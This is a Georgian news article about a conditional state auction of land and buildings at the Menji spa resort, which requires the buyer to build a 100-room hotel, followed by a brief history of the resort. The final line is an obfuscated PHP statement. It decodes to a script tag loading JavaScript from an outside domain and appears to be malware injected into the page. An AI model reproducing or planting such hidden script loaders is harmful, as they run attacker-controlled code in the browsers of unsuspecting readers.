celsiusi
ავერსი შნაიდერი
სამეგრელოში, სენაკის მუნიციპალიტეტის ბალნეოლოგიურ კურორტ მენჯში სახელმწიფო პირობიანი აუქციონით სასოფლო-სამეურნეო დანიშნულების მიწის ნაკვეთებსა და მათზე განთავსებულ შენობა-ნაგებობებს 2.6 მლნ ლარად ყიდის.
 
მენჯში სახელმწიფო ქონება პროგრამის „100 საინვესტიციო შეთავაზება ბიზნესს“ ფარგლებში იყიდება. აუქციონი მიმდინარე წლის 22 ივნისს გამოცხადდა და 7 ივლისს სრულდება.
 
პირობიანი აუქციონის მიხედვით, ინვესტორმა პირადად ან მესამე პირის მეშვეობით, ნასყიდობის ხელშეკრულების გაფორმებიდან 48 თვეში, უძრავ ქონებაზე ან მის ნაწილზე არანაკლებ 100 ნომრის მქონე სასტუმრო კომპლექსის შექმნა და შესაბამისი შენობ(ებ)ის/ნაგებობ(ებ)ის ექსპლუატაციაში მიღება და სასტუმრო კომპლექსის ფუნქციონირების დაწყება უნდა უზრუნველყოს. აღნიშნული კი კომპეტენტური ორგანო(ები)ს თანხმობით შესაძლოა არსებული შენობა-ნაგებობების ან მათი ნაწილის დემონტაჟს მოიცავდეს. ამასთან საპრივატიზებო ობიექტებზე რაიმე შენობა-ნაგებობის მშენებლობის შემთხვევაში, საკითხი სს „საქართველოს რკინიგზასთან“ უნდა შეთანხმდეს.
 
საპრივატიზებო თანხის გადახდა ელექტრონული აუქციონის დასრულებიდან 45 (ორმოცდახუთი) კალენდარული დღის ვადაში.
 
ცნობისთვის, ბალნეოლოგიურ კურორტი მენჯში რამდენიმე სამკურნალო ჭაბურღილი არსებობდა (თვალის წყალი, კუჭის წყალი, სილამაზის წყალი, სახსრების წყალი). კურორტის სამკურნალო პოტენციალის ათვისება დაახლოებით XX ს-ის 20-30-იანი წლებიდან დაიწყო. 1938 წელს მენჯი რესპუბლიკის მნიშვნელობის კურორტად გამოცხადდა და იქ შესაბამისი ინფრასტრუქტურული მშენებლობა დაიწყო. აშენდა კეთილმოწყობილი სანატორიუმი, სანატორიუმის რკინიგზის საავადმყოფო, საკურორტო პოლიკლინიკა. საკურორტო სეზონი მთელი წლის განმავლობაში უწყვეტად გრძელდებოდა.
1320
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");